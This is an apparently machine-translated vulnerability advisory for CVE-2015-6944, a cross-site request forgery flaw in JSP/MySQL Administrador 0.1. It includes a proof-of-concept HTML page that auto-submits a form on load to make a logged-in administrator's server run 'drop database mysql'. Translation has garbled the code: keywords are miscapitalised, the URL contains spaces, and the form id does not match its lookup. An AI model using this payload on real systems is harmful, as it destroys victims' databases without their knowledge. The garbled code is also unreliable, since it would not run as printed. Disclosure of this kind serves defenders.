JSP/MySQL Administrador Web Cross-Site Request Forgery Vulnerability (CVE-2015-6944)
JSP/MySQL Administrador Web Cross-Site Request Forgery Vulnerability (CVE-2015-6944)
Release date:
Updated on:
Affected Systems:
JSPMySQL Administrador JSPMySQL Administrador 0.1
Description:
CVE (CAN) ID: CVE-2015-6944
JSPMySQL Administrador is a remote management tool for MySQL Databases on JSP Web servers.
The implementation of JSP/MySQL Administrador Web 1 has a Cross-Site Request Forgery Vulnerability. Remote attackers can use the cmd parameter sys/listaBD2.jsp to hijack user authentication requests.
<* Source: hyp3rlinx
Link: http://www.securityfocus.com/archive/1/archive/1/536406/100/0/threaded
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Hyp3rlinx () provides the following test methods:
<! DOCTYPE>
<Html>
<Head>
<Title> JSP-MYSQL-ADMIN-CSRF </title>
<Body onLoad = "doit ()">
<Script>
Function doit (){
Var e = document. getElementById ('hell ')
E. submit ()
}
<! -- Csrf drop mysql database -->
<Form id = "HELL" action = "http: // localhost: 8081/sys/listaBD2.jsp" method = "post">
<Input type = "text" name = "cmd" value = "drop database mysql"/>
<Input type = "text" name = "btncmd" value = "Enviar"/>
<Input type = "text" name = "bd" value = "mysql"/>
</Form>
Suggestion:
Vendor patch:
JSPMySQL Administrador
----------------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Https://sites.google.com/site/mfpledon/producao-de-software
This article permanently updates the link address: